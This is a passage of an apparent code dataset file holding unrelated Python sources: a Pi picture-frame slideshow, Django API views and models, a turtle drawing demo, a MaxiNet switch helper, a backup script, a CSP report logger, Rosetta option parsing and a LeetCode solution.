(dt_from is not None and dt < dt_from) or (dt_to is not None and dt > dt_to):\n include_flag = False\n if include_flag:\n file_list.append((file_path_name, orientation, os.path.getmtime(file_path_name))) # iFiles now list of tuples (file_name, orientation) \n if shuffle:\n file_list.sort(key=lambda x: x[2]) # will be later files last\n temp_list_first = file_list[-RECENT_N:]\n temp_list_last = file_list[:-RECENT_N]\n random.shuffle(temp_list_first)\n random.shuffle(temp_list_last)\n file_list = temp_list_first + temp_list_last\n else:\n file_list.sort() # if not suffled; sort by name\n return file_list, len(file_list) # tuple of file list, number of pictures\n\nEXIF_DATID = None # this needs to be set before get_files() above can extract exif date info\nEXIF_ORIENTATION = None\nfor k in ExifTags.TAGS:\n if ExifTags.TAGS[k] == 'DateTimeOriginal':\n EXIF_DATID = k\n if ExifTags.TAGS[k] == 'Orientation':\n EXIF_ORIENTATION = k\n\n\nDISPLAY = pi3d.Display.create(x=0, y=0, frames_per_second=FPS,\n display_config=pi3d.DISPLAY_CONFIG_HIDE_CURSOR, background=BACKGROUND)\nCAMERA = pi3d.Camera(is_3d=False)\nprint(DISPLAY.opengl.gl_id)\n\nshader = pi3d.Shader(\"/home/pi/src/vrniture/pictureframe/shaders/blend_new\")\nslide = pi3d.Sprite(camera=CAMERA, w=DISPLAY.width, h=DISPLAY.height, z=5.0)\nslide.set_shader(shader)\nslide.unif[47] = EDGE_ALPHA\n\n\n# images in iFiles list\nnexttm = 0.0\niFiles, nFi = get_files(date_from, date_to)\nrandom.shuffle(iFiles)\n\n# now just limit the files - DG\n#iFiles = iFiles[:50]\nnFi = len(iFiles)\n\nnext_pic_num = 0\nsfg = None # slide for background\nsbg = None # slide for foreground\nif nFi == 0:\n print('No files selected!')\n exit()\n\n\nnum_run_through = 0\nwhile DISPLAY.loop_running():\n tm = time.time()\n if nFi > 0:\n if (tm > nexttm and not paused) or (tm - nexttm) >= 86400.0: # this must run first iteration of loop\n nexttm = tm + time_delay\n a = 0.0 # alpha - proportion front image to back\n sbg = sfg\n sfg = None\n while sfg is None: # keep going through until a usable picture is found TODO break out how?\n pic_num = next_pic_num\n sfg = tex_load(iFiles[pic_num][0], iFiles[pic_num][1], (DISPLAY.width, DISPLAY.height))\n next_pic_num += 1\n if next_pic_num >= nFi:\n DISPLAY.destroy() # don't loop, exit one we've rendered all the pictures - DG\n\n if sbg is None: # first time through\n sbg = sfg\n slide.set_textures([sfg, sbg])\n slide.unif[45:47] = slide.unif[42:44] # transfer front width and height factors to back\n slide.unif[51:53] = slide.unif[48:50] # transfer front width and height offsets\n\n wh_rat = (DISPLAY.width * sfg.iy) / (DISPLAY.height * sfg.ix)\n if (wh_rat > 1.0 and FIT) or (wh_rat <= 1.0 and not FIT):\n sz1, sz2, os1, os2 = 42, 43, 48, 49\n else:\n sz1, sz2, os1, os2 = 43, 42, 49, 48\n wh_rat = 1.0 / wh_rat\n\n slide.unif[sz1] = wh_rat\n slide.unif[sz2] = 1.0\n slide.unif[os1] = (wh_rat - 1.0) * 0.5\n slide.unif[os2] = 0.0\n\n if KENBURNS:\n xstep, ystep = (slide.unif[i] * 2.0 / time_delay for i in (48, 49))\n slide.unif[48] = 0.0\n slide.unif[49] = 0.0\n\n if KENBURNS:\n t_factor = nexttm - tm\n slide.unif[48] = xstep * t_factor\n slide.unif[49] = ystep * t_factor\n\n if a < 1.0: # transition is happening\n a += delta_alpha\n slide.unif[44] = a\n else: # no transition effect safe to resuffle etc\n if tm > next_check_tm:\n if check_changes():\n iFiles, nFi = get_files(date_from, date_to)\n num_run_through = 0\n next_pic_num = 0\n next_check_tm = tm + CHECK_DIR_TM # once per hour\n\n slide.draw()\n\ntry:\n client.loop_stop()\nexcept Exception as e:\n print(\"this was going to fail if previous try failed!\")\nDISPLAY.destroy()\n\n# Run the main vrnjr script if we're done\nimport os, subprocess\nsubprocess.Popen([ '/usr/bin/env', 'python3', '/home/pi/src/vrniture/vrn-run.py' ])\nsys.exit(0)\n","sub_path":"pictureframe/PictureFrame.py","file_name":"PictureFrame.py","file_ext":"py","file_size_in_byte":10566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"413775052","text":"from rest_framework import mixins, serializers, viewsets\nfrom rest_framework.permissions import IsAuthenticated\n\nfrom api.exceptions import AppException\nfrom api.models import SituationCategoryComment\nfrom api.permissions import UserIsObjectOwnerPermission\nfrom api.resources.user import UserSerializer, UserNestedSerializer\nfrom api.utils import *\n\n\nfields = AppList(\n 'id',\n 'user', 'situation_category_thread', 'parent', 'description',\n 'is_country_representative',\n 'created', 'updated'\n)\n\npost_fields = AppList(\n 'situation_category_thread', 'parent', 'description',\n)\n\n\nclass SituationCategoryCommentSerializer(serializers.ModelSerializer):\n\n user = UserNestedSerializer(many=False, read_only=True)\n is_country_representative = serializers.SerializerMethodField('get_is_country_representative', read_only=True)\n\n class Meta:\n model = SituationCategoryComment\n fields = fields\n read_only_fields = fields - post_fields\n\n def create(self, validated_data):\n parent = validated_data.get('parent')\n if parent:\n situation_category_comment = SituationCategoryComment.objects.get(id=parent.id)\n if situation_category_comment.parent:\n raise AppException()\n\n validated_data['user'] = self.context['request'].user\n\n return super().create(validated_data)\n\n def get_is_country_representative(self, obj):\n return obj.user in obj.situation_category_thread.strategy.board.users.all()\n\n\nclass SituationCategoryCommentViewSet(\n mixins.CreateModelMixin,\n mixins.ListModelMixin,\n mixins.RetrieveModelMixin,\n mixins.UpdateModelMixin,\n mixins.DestroyModelMixin,\n viewsets.GenericViewSet\n):\n\n queryset = SituationCategoryComment.objects.all()\n serializer_class = SituationCategoryCommentSerializer\n filterset_fields = ['user', 'situation_category_thread']\n\n def get_permissions(self):\n if self.action in ['list', 'retrieve']:\n permission_classes = []\n else:\n permission_classes = [IsAuthenticated, UserIsObjectOwnerPermission]\n return [permission() for permission in permission_classes]\n","sub_path":"api/resources/comments/situation_category_comment.py","file_name":"situation_category_comment.py","file_ext":"py","file_size_in_byte":2165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"607645486","text":"from django.conf.urls import patterns, include, url, static\nfrom django.conf import settings\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns(\n '',\n url(r'^$', include('home.urls', namespace='index')),\n url(r'^events/', include('events.urls', namespace='events')),\n url(r'^managers/', include('managers.urls', namespace='managers')),\n url(r'^rooms/', include('rooms.urls', namespace='rooms')),\n url(r'^buildings/', include('buildings.urls', namespace='buildings')),\n url(r'^admin/', include(admin.site.urls)),\n)\n\nif settings.DEBUG:\n urlpatterns += patterns(\n '',\n url(\n r'^media/(?P.*)$',\n 'django.views.static.serve',\n {'document_root': settings.MEDIA_ROOT}\n ),\n )\n","sub_path":"ASUEvents/ASUEvents/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"523897594","text":"import turtle\nimport math\nimport random\nfrom typing import Any, Union\n\n\ndef trees( noOfTrees,house) :\n wood=0;\n count=0;\n #To randomly call tree functions\n while noOfTrees>0 :\n\n if house==\"y\" or house==\"Y\" :\n result=random.randint(0,4)\n print(result)\n print(treesArray[result])\n\n if result==3 and house==\"y\" or house==\"Y\":\n space()\n wallLength=100\n drawHouse(wallLength)\n wood+=(2*wallLength+ 2*(math.sqrt((wallLength/2)**2 + (wallLength/2)**2)))\n house='N'\n else :\n wood+=treesArray[result]()\n noOfTrees=noOfTrees-1\n count+=1\n return wood\n\ndef pine() :\n space()\n length=random.randint(50,150)\n drawTrunk(length)\n drawTriangle()\n drawTrunk(length)\n turtle.left(180)\n return length\n\ndef maple() :\n space()\n length = random.randint(50, 200)\n drawTrunk(length)\n drawCircle()\n drawTrunk(length)\n turtle.left(180)\n return length\n\ndef other():\n space()\n length = random.randint(50, 200)\n drawTrunk(length)\n drawCircle()\n turtle.right(180)\n drawCircle()\n turtle.right(180)\n drawCircle()\n drawTrunk(length)\n turtle.left(180)\n return length\n\ndef drawTrunk( length) :\n turtle.left(90)\n turtle.forward(length)\n turtle.right(90)\n return\n\ndef drawTriangle() :\n triangleSide=random.randint(20,50)\n turtle.forward(triangleSide/2)\n for i in range(0,3) :\n turtle.left(120)\n turtle.forward(triangleSide)\n turtle.backward(triangleSide/2)\n turtle.left(180)\n return\n\ndef drawCircle() :\n radius=random.randint(10,30)\n turtle.circle(radius)\n turtle.left(180)\n return\n\ndef space() :\n\n turtle.forward(random.randint(60,70))\n return\n\ndef drawHouse( length =100 ) :\n\n turtle.forward(length)\n turtle.left(90)\n turtle.forward(length)\n turtle.left(45)\n turtle.forward(math.sqrt((length/2)**2 + (length/2)**2))\n turtle.left(90)\n turtle.forward(math.sqrt((length/2)**2 + (length/2)**2))\n turtle.left(45)\n turtle.forward(length)\n turtle.left(90)\n turtle.forward(length)\n return\n\n\n\ndef day(wallWood) :\n\n drawHouse(wallWood)\n drawSun(wallWood)\n\ndef drawSun(wallWood) :\n\n turtle.up()\n turtle.left(90)\n turtle.forward(2*wallWood)\n turtle.down()\n turtle.circle(random.randint(20,30))\n\ndef setWidow() :\n turtle.penup()\n turtle.setposition(-250, -200)\n turtle.down()\n\n#List to store tree functions\ntreesArray=[pine,maple,other]\n\ndef main() :\n\n noOfTrees = int(input(\"Enter the number of trees in your forest\"))\n house=input(\"Is there a house in the forest (Y/N) ? \")\n setWidow()\n #function to draw night scene\n totalWood=trees(noOfTrees,house)\n\n input(\"Night is done, press enter for day\")\n\n print(\"We have \",totalWood ,\"units of lumber for building\")\n wallWood=totalWood*((2-math.sqrt(2))/2)\n print(\"We will build a house with walls \",wallWood,\" tall.\")\n turtle.reset()\n setWidow()\n day(wallWood)\n\n\n turtle.mainloop()\n\n\n\nmain()","sub_path":"TurtleDemos/nightAndDay.py","file_name":"nightAndDay.py","file_ext":"py","file_size_in_byte":3155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"548050891","text":"#Read My Timetable\n\n#----------------------------------------\ndef readfile(day):\n\n filename=day+\".txt\"\n channel = open(filename,\"r+\")\n lesson=channel.readlines()\n\n channel.close()\n return lesson\n#----------------------------------------\n\n\nday=input(\"Day of week\")\n\nlesson=readfile(day)\nprint(lesson)","sub_path":"6a Read My Timetable.py","file_name":"6a Read My Timetable.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"168467120","text":"import time\nimport logging\n\nfrom MaxiNet.tools import Tools\n\nclass SwitchNode():\n def __init__(self, switch_id, worker_id, children):\n self._sid = switch_id\n self._wid = worker_id\n self._children = children\n self._ip_addr = Tools.makeIP(self._sid)\n\n def build_links(self):\n for child in self._children:\n if (self._sid, child) not in self.expr.links:\n self.create_link_with(child)\n self.expr.links.add((child, self._sid))\n\n # Build the switch on the worker\n def create_switch(self):\n switch_name = 's{}'.format(self._sid)\n host_name = 'h{}'.format(self._sid)\n self.expr.addSwitch(switch_name,\n dpid=Tools.makeDPID(self._sid), wid=self._wid)\n self.expr.addHost(host_name,\n ip=self._ip_addr, max=Tools.makeMAC(self._sid),\n pos=switch_name)\n self.expr.addLink(switch_name, host_name, autoconf=True)\n\n logging.info('Created switch {} ({}) on worker {}'.format(\n self._sid,\n self._ip_addr,\n self._wid + 1,\n ))\n time.sleep(2)\n\n def create_link_with(self, link_switch):\n switch_name_1 = 's{}'.format(self._sid)\n switch_name_2 = 's{}'.format(link_switch)\n self.expr.addLink(switch_name_1, switch_name_2, autoconf=True)\n logging.info('Built link: {} ({}) <-> {} ({})'.format(\n self._sid,\n self._ip_addr,\n link_switch,\n Tools.makeIP(link_switch),\n ))\n time.sleep(2)\n","sub_path":"maxinet-code/perf/switch_node.py","file_name":"switch_node.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"390605344","text":"#!/usr/bin/env python\n# Credit to https://gist.github.com/JrMasterModelBuilder/4eff31252815669d90d1040be912a303 for this code\nimport os\nimport sys\nimport time\nimport datetime\nimport shutil\n\ndef timestamp():\n\treturn datetime.datetime.utcnow().strftime('%Y-%m-%d_%H-%M-%S-%f')\n\ndef mkdirp(path):\n\tif not os.path.exists(path):\n\t\tos.makedirs(path)\n\ndef backupDB(argv):\n\tif len(argv) < 3:\n\t\tprint('USAGE: %s save_file backup_dir' % (argv[0]))\n\t\treturn 1\n\n\tsave_file = argv[1]\n\tbackup_dir = argv[2]\n\n\tsave_file_basename = os.path.basename(save_file)\n\n\tmkdirp(backup_dir)\n\n\tlast_modified = None\n\n\tmodified = None\n\ttry:\n\t\tmodified = str(os.path.getmtime(save_file))\n\texcept Exception as ex:\n\t\tprint('Reading file modified failed: %s' % (str(ex)))\n\n\tif last_modified != modified:\n\t\tbackup_file_name = '%s_%s' % (timestamp(), save_file_basename)\n\t\tbackup_file_path = os.path.join(backup_dir, backup_file_name)\n\n\t\ttry:\n\t\t\tshutil.copyfile(save_file, backup_file_path)\n\t\t\tlast_modified = modified\n\t\t\tprint('Backup created: %s' % (backup_file_name))\n\t\texcept Exception as ex:\n\t\t\tprint('Backup failed: %s' % (str(ex)))\n\n\n#if __name__ == '__main__':\n#\tsys.exit(main(sys.argv))","sub_path":"SPENT/DBBackup.py","file_name":"DBBackup.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"632896324","text":"from urllib.parse import urlparse\nfrom csp_report.models import CSPReport, CleanedCSPReport, CSPReportFilter\nfrom django.conf import settings\n\nBLOCKED_URL_FILTERS = [\n {'type': 'equals', 'value': 'data'},\n {'type': 'equals', 'value': 'asset'},\n]\n\n\ndef write_csp_report(report_data):\n return CSPReport.objects.create(**report_data)\n\n\ndef write_cleaned_csp_report(report):\n csp_blocked_url_filters = getattr(settings, 'CSP_BLOCKED_URL_FILTERS', BLOCKED_URL_FILTERS)\n\n cspreportfilters = CSPReportFilter.objects.filter(is_enabled=True).values()\n from_db_filter = [{'type': _['filter_type'], 'value': _['value']} for _ in cspreportfilters]\n\n for _ in csp_blocked_url_filters + from_db_filter:\n filter_type, filter_value = _['type'], _['value']\n if filter_type == 'equals':\n if report.blocked_uri == filter_value:\n return\n elif filter_type == 'startswith':\n if report.blocked_uri.startswith(filter_value):\n return\n\n parse_document_uri = urlparse(report.document_uri)\n parse_blocked_uri = urlparse(report.blocked_uri)\n\n report_data = {\n 'report': report,\n 'document_scheme': parse_document_uri.scheme,\n 'document_domain': parse_document_uri.netloc,\n 'document_path': parse_document_uri.path,\n 'document_query': parse_document_uri.query,\n 'blocked_domain': parse_blocked_uri.netloc,\n 'blocked_url': parse_blocked_uri.path + parse_blocked_uri.query,\n }\n\n return CleanedCSPReport.objects.create(**report_data)\n\n\ndef get_important_request_meta(headers, important_headers=None):\n if not important_headers:\n important_headers = [\n 'HTTP_USER_AGENT',\n 'HTTP_X_FORWARDED_FOR',\n 'HTTP_X_REAL_IP',\n 'REMOTE_ADDR',\n 'HTTP_ORIGIN',\n 'HTTP_CACHE_CONTROL',\n 'SERVER_NAME',\n ]\n return {k: v for k, v in headers.items() if k in important_headers}\n\n\ndef process_scp_report(data, **kwargs):\n request_meta = kwargs.get('request_meta', {})\n report_data = dict(\n host=kwargs.get('host', ''),\n document_uri=data['document-uri'],\n blocked_uri=data['blocked-uri'],\n referrer=data.get('referrer', ''),\n body=data,\n request_meta=get_important_request_meta(request_meta),\n )\n\n report = write_csp_report(report_data)\n\n write_cleaned_csp_report(report)","sub_path":"csp_report/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"587415266","text":"#!/usr/bin/env python3\n#\n# (c) Copyright Rosetta Commons Member Institutions.\n# (c) This file is part of the Rosetta software suite and is made available under license.\n# (c) The Rosetta software is developed by the contributing members of the Rosetta Commons.\n# (c) For more information, see http://www.rosettacommons.org. Questions about this can be\n# (c) addressed to University of Washington CoMotion, email: license@uw.edu.\n'''\nDefinitions or Basic classes used in mol2genparams.py or Molecule type.\n\nAuthor: Hahnbeom Park and Frank DiMaio \n'''\nimport sys\nfrom optparse import OptionParser\nfrom Types import *\n\nclass OptionClass:\n def __init__(self,argv):\n self.debug = False\n\n self.init_from_parser(argv)\n\n # basic options\n self.verbose = self.opt.debug\n self.resname_counter = 0\n\n # chi angle control\n self.opt.report_puckering_chi = False\n self.opt.report_Hapol_chi = False\n self.opt.report_nbonded_chi = False\n self.opt.report_amide_chi = False\n self.opt.report_ringring_chi = True\n\n # constants / unchanged\n self.opt.reassign_biaryl_aclass = False\n self.opt.report_as_atype = True\n self.opt.report_as_mmtype = False\n self.opt.define_aro_by_input_geometry = False #unused now\n self.opt.longest_puckering_ring = 6\n self.opt.ring_sampling_sp3_only = True\n \n def init_from_parser(self,argv):\n usagemsg = \"USAGE: python mol2genparams.py [-s mol2file or -l mol2filelist] [options]\\n\"\n usagemsg += \" For more questions, please email hahnbeom@uw.edu or dimaio@uw.edu\"\n parser = OptionParser(usage=usagemsg)\n parser.add_option(\"-s\",\"--inputs\",\n default=[],\n help=\"\",\n action=\"append\"\n )\n parser.add_option(\"-l\",\n default=False,\n help=\"\",\n type=\"string\",\n )\n parser.add_option(\"--nm\",\"--resname\",\n dest=\"resname\",\n default=None,\n help=\"Residue name\",\n )\n parser.add_option(\"--auto_nm\",\n dest=\"auto_resprefix\",\n default=None,\n help=\"Automatically rename resname starting with argument; default L[00-99]\",\n #type=\"string\"\n )\n parser.add_option(\"--am1bcc\",\n dest=\"do_am1bcc_calc\",\n default=False,\n help=\"Calculate am1bcc charge\",\n action=\"store_true\"\n )\n parser.add_option(\"--prefix\",\n default=None,\n help=\"Prefix of output names (prefix.params,prefix_0001.pdb), default as the prefix of input mol2 file\",\n )\n parser.add_option(\"--debug\",\n default=False,\n help=\"Report verbose output for debugging\",\n action=\"store_true\"\n )\n parser.add_option(\"--no_output\",\n default=False,\n help=\"Do not report params or pdb\",\n action=\"store_true\"\n )\n parser.add_option(\"--funcgrp\",\n dest=\"report_funcgrp\",\n default=False,\n help=\"Report functional group assignment to stdout\",\n action=\"store_true\"\n )\n parser.add_option(\"--elec_cp_rep\",\n dest=\"write_elec_cp_rep\",\n default=False,\n help=\"Report elec-countpair info to [prefix].elec_cp_ref\",\n action=\"store_true\"\n )\n parser.add_option(\"--elec_grpdef\",\n dest=\"write_elec_grpdef\",\n default=False,\n help=\"Report elec-grp-definition info to [prefix].grpref\",\n action=\"store_true\"\n )\n parser.add_option(\"--puckering_chi\",\n default=False,\n help=\"Define ring puckering torsions as rotatable CHI\",\n action=\"store_true\"\n )\n parser.add_option(\"--amide_chi\",\n default=False,\n help=\"Define amide as rotatable CHI\",\n action=\"store_true\"\n )\n parser.add_option(\"--freeze_ringring\",\n default=False,\n help=\"Define as rotatable CHI\",\n action=\"store_true\"\n )\n\n if len(argv) < 2:\n parser.print_help()\n sys.exit()\n \n (self.opt, args) = parser.parse_args(args=argv[1:])\n if self.opt.l:\n self.opt.inputs = [l[:-1] for l in open(self.opt.l)]\n\n if self.opt.inputs == []:\n parser.print_help()\n sys.exit()\n \n if self.opt.resname != None and self.opt.auto_resprefix != None:\n sys.exit(\"--nm and --auto_nm cannot be used together!\")\n\n if self.opt.resname != None:\n print (\"Renaming ligand residue name as %s\"%self.opt.resname)\n else:\n self.opt.resname = \"LG1\"\n \n if self.opt.auto_resprefix != None:\n self.opt.auto_resname = True\n if len(self.opt.auto_resprefix) > 1:\n print( \"argument for --auto_nm should be 1-character! Using prefix 'L' instead (named as L00 ~ L99)\" )\n self.opt.auto_resprefix = \"L\"\n else:\n self.opt.auto_resname = False\n self.opt.auto_resprefix = \"L\"\n\n def get_resname(self):\n if self.opt.auto_resname:\n if self.resname_counter > 99:\n print( \"WARNING! Residue name will have > 3 characters which may cause issue with Rosetta. Try by splitting list to contain < 100 entries\")\n resname = '%1s%02d'%(self.opt.auto_resprefix,\n self.resname_counter)\n else:\n resname = self.opt.resname\n return resname\n \nclass AtomClass:\n def __init__(self,name,atype,hyb,charge):\n self.hyb = hyb\n self.name = name\n self.atype = atype\n self.bonds = []\n self.connected_to_polar = False\n self.has_H = False\n self.is_H = (atype == 2)\n self.aclass = 0\n self.charge = charge\n self.icoord = []\n self.vrt_i = -1 #undefined\n self.root = -1 # undefined\n self.groot = -1 #undefined\n self.ring_index = -1 #undefined\n \n def add_bond(self,atm_connected,order):\n self.bonds.append((atm_connected,order))\n\n def report_self(self):\n return ' %2s %6s %3d'%(self.atype,self.name,self.hyb)\n\nclass BondClass:\n def __init__(self,atm1,atm2,order):\n self.atm1 = min(atm1,atm2)\n self.atm2 = max(atm1,atm2)\n self.order = order\n if self.order > 1:\n self.is_conjugated = True\n else:\n self.is_conjugated = False\n self.cut_bond = False\n\n def order_in_params(self):\n if self.order == 1 and self.is_conjugated: #use this until we get conjugated type working\n return 2\n else:\n return self.order\n\nclass RingClass:\n def __init__(self,atms,cut=None):\n #type:\n #1: puckering & ring-sampling\n #2: puckering & not ring-sampling\n #3: puckering & long (chi-sampling)\n #4: aromatic\n #5: sugar\n self.type = None \n self.atms = atms\n self.natms = len(atms)\n self.cut_bond = cut\n\n def has(self,atms):\n for atm in atms:\n if atm not in self.atms:\n return False\n return True\n\nclass FunctionalGroupClass:\n def __init__(self,atms,grptype):\n self.atms = atms\n self.grptype = grptype\n\n def show(self,out):\n l = '%-15s '%self.grptype\n l += '.'.join([atm.name for atm in self.atms])\n l += ' '+'.'.join([ACLASS_ID[atm.aclass] for atm in self.atms])\n out.write(l+'\\n')\n \n","sub_path":"main/source/scripts/python/public/generic_potential/BasicClasses.py","file_name":"BasicClasses.py","file_ext":"py","file_size_in_byte":8546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"328245434","text":"# -*- coding: utf-8 -*-\n# author:lyh\n# datetime:2020/7/26 10:06\n\"\"\"\n1531. 压缩字符串 II\n\n行程长度编码 是一种常用的字符串压缩方法,它将连续的相同字符(重复 2 次或更多次)替换为字符和表示字符计数的数字(行程长度)。例如,用此方法压缩字符串 \"aabccc\" ,将 \"aa\" 替换为 \"a2\" ,\"ccc\" 替换为` \"c3\" 。因此压缩后的字符串变为 \"a2bc3\" 。\n\n注意,本问题中,压缩时没有在单个字符后附加计数 '1' 。\n\n给你一个字符串 s 和一个整数 k 。你需要从字符串 s 中删除最多 k 个字符,以使 s 的行程长度编码长度最小。\n\n请你返回删除最多 k 个字符后,s 行程长度编码的最小长度 。\n\n\n\n示例 1:\n\n输入:s = \"aaabcccd\", k = 2\n输出:4\n解释:在不删除任何内容的情况下,压缩后的字符串是 \"a3bc3d\" ,长度为 6 。最优的方案是删除 'b' 和 'd',这样一来,压缩后的字符串为 \"a3c3\" ,长度是 4 。\n\n示例 2:\n\n输入:s = \"aabbaa\", k = 2\n输出:2\n解释:如果删去两个 'b' 字符,那么压缩后的字符串是长度为 2 的 \"a4\" 。\n\n示例 3:\n\n输入:s = \"aaaaaaaaaaa\", k = 0\n输出:3\n解释:由于 k 等于 0 ,不能删去任何字符。压缩后的字符串是 \"a11\" ,长度为 3 。\n\n\n\n提示:\n\n 1 <= s.length <= 100\n 0 <= k <= s.length\n s 仅包含小写英文字母\n\"\"\"\n\n\nclass Solution:\n def getLengthOfOptimalCompression(self, s: str, k: int) -> int:\n if k >= len(s):\n return 0\n\n def count_val(count: int) -> int:\n if count >= 100:\n return 4\n elif count >= 10:\n return 3\n elif count >= 2:\n return 2\n else:\n return 1\n z = len(s)\n dp = [[-1 for j in range(len(s) - k + 1)] for i in range(len(s))]\n for i in range(z - 1, -1, -1):\n # dp[i][0] = 0\n for j in range(1, z - k + 1):\n if i + j > z:\n # dp[i][j] = -1\n break\n count = 0\n remain = j\n min_value = 1000\n for t in range(i, len(s)):\n if s[t] == s[i]:\n count += 1\n remain -= 1\n else:\n if dp[t][remain] == -1:\n break\n min_value = min(min_value, count_val(count) + dp[t][remain])\n if remain == 0:\n min_value = min(min_value, count_val(count))\n break\n dp[i][j] = min_value\n res = 1000\n for i in range(k + 1):\n res = min(res, dp[i][len(s) - k])\n return res\n\n\nif __name__ == '__main__':\n print(Solution().getLengthOfOptimalCompression(\"aaabcccd\", 2), 4)\n print(Solution().getLengthOfOptimalCompression(\"aabbaa\", 2), 2)\n print(Solution().getLengthOfOptimalCompression(\"aaaaaaaaaaa\", 0), 3)\n print(Solution().getLengthOfOptimalCompression(\"bbabbbabbbbcbb\", 4), 3)\n print(Solution().getLengthOfOptimalCompression(\"aabaabbcbbbaccc\", 6), 4)\n","sub_path":"Solutions/1531.getLengthOfOptimalCompression.hard.py","file_name":"1531.getLengthOfOptimalCompression.hard.py","file_ext":"py","file_size_in_byte":3195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"541612950","text":"from django.db import models\nfrom client.models import Client\nfrom trainers.models import Profile\n\nclass Order(models.Model):\n one = '1'\n less = '1-3'\n more = '>3'\n\t\n COUNT_CHOICES = (\n\t (one, '1'),\n (less, '2-3'),\n\t\t(more, 'больше 3')\n\t\n\t)\n client = models.ForeignKey(Client, blank=True, null=True)\n phone = models.CharField(max_length=15, blank=True)\n text = models.TextField(verbose_name='Комментарий', blank=True)\n trainer = models.ForeignKey(Profile, blank=True, null=True)\n created = models.DateTimeField(auto_now_add=True, auto_now=False)\n train_count = models.CharField(max_length=5, choices=COUNT_CHOICES, default=more,\n verbose_name='Предполагаемое колличество занятий')\n status = models.BooleanField(default=False, verbose_name='Статус заказа')\n pay_ok = models.BooleanField(default=False)\n urls = models.URLField(blank=True, null=True)\n\n\n def __str__(self):\n return str(self.id)\n\n class Meta:\n verbose_name = 'Заказ'\n verbose_name_plural = \"Заказы\"\n ordering = ['-created']\n\n","sub_path":"order/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"411090238","text":"#!/usr/bin/python3\n\nimport csv\n\ndef media(lst): \n return sum(lst) / len(lst) \n\ndic = {}\nwith open('../../Data/candies.csv') as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n line_count = 0\n for row in csv_reader:\n if line_count == 0:\n \tprint(row[0] + ' ' + row[1])\n else:\n \tyear,month,date = row[0].split('-')\n \tif month in dic: \n \t\tdic[month].append((int(year), float(row[1])))\n \telse:\n \t\tdic[month] = [(int(year), float(row[1]))]\n line_count += 1\n print(f'Processed {line_count} lines.')\nprint(dic)\n\nfor key in dic: \n\tprint('Month: ' + key + ' Mean: ' + str(media(dic[key][1])))\n","sub_path":"SPLN/TPC/TPC1/data_structures2.py","file_name":"data_structures2.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"576239608","text":"# -*- coding=utf-8 -*-\n# Create your views here.\nfrom django.shortcuts import render_to_response\nfrom django.shortcuts import HttpResponse, HttpResponseRedirect, RequestContext\nfrom dashboard.models import UserProfile, Building\nfrom order.models import PrintOrder\nfrom eprint import validate\nfrom eprint.views import authenticated_view\nfrom dashboard.models import get_grouped_buildings\nfrom eprint.settings import MEDIA_ROOT\nimport os\nfrom eprint.views import get_building_with_id, show_success\n\n\ndef get_profile_of_user(user):\n try:\n user_profile = UserProfile.objects.get(user=user)\n except:\n user_profile = None\n return user_profile\n\n\ndef get_user_print_orders(user):\n return PrintOrder.objects.filter(user=user).order_by('time')[0:5].reverse()\n\n\n@authenticated_view\ndef order_list(request):\n user = request.user\n context = RequestContext(request)\n context['orders'] = get_user_print_orders(user)\n return render_to_response('order_list.html', context)\n\n\n@authenticated_view\ndef user_info(request):\n user = request.user\n user_profile = get_profile_of_user(user)\n if not user_profile:\n user_profile = {}\n context = RequestContext(request)\n context['user_profile'] = user_profile\n context['groups'] = get_grouped_buildings()\n return render_to_response('user_info.html', context)\n\n\n@authenticated_view\ndef dashboard(request):\n return order_list(request)\n\n\ndef validate_user_profile(user_profile):\n if validate.update_profile_validate['name'](user_profile.name) \\\n and validate.update_profile_validate['phone'](user_profile.phone_number) \\\n and validate.update_profile_validate['student_number'](user_profile.number) \\\n and validate.update_profile_validate['building'](user_profile.building) \\\n and validate.update_profile_validate['gender'](user_profile.gender):\n return True\n return False\n\n\n@authenticated_view\ndef update_profile(request):\n user = request.user\n name = request.GET['name']\n phone = request.GET['phone']\n student_number = request.GET['student_number']\n building_id = request.GET['building']\n building = get_building_with_id(building_id)\n if building is None:\n return show_success('好像有什么东西没输入', '/dashboard', RequestContext(request))\n gender = request.GET['gender']\n\n user_profile = get_profile_of_user(user)\n if not user_profile:\n user_profile = UserProfile()\n user_profile.user = user\n user_profile.name = name\n user_profile.phone_number = phone\n user_profile.building = building\n user_profile.gender = gender\n user_profile.number = student_number\n\n if validate_user_profile(user_profile):\n user_profile.save()\n return show_success('你的信息已经保存啦', '/dashboard', RequestContext(request))\n else:\n # TODO: show error message here\n return HttpResponseRedirect('/dashboard')\n\n\ndef get_order_of(user, id):\n try:\n order = PrintOrder.objects.get(user=user, id=id)\n except:\n order = None\n return order\n\n\ndef download_file_response(order):\n path = os.path.join(MEDIA_ROOT, str(order.up_file))\n f = open(path, \"rb\")\n response = HttpResponse(f.read(), content_type='application/octet-stream; charset=utf-8')\n f.close()\n response['Content-Length'] = os.path.getsize(str(path))\n response['Content-Encoding'] = 'utf-8'\n response['Content-Disposition'] = 'attachment;filename=%s' 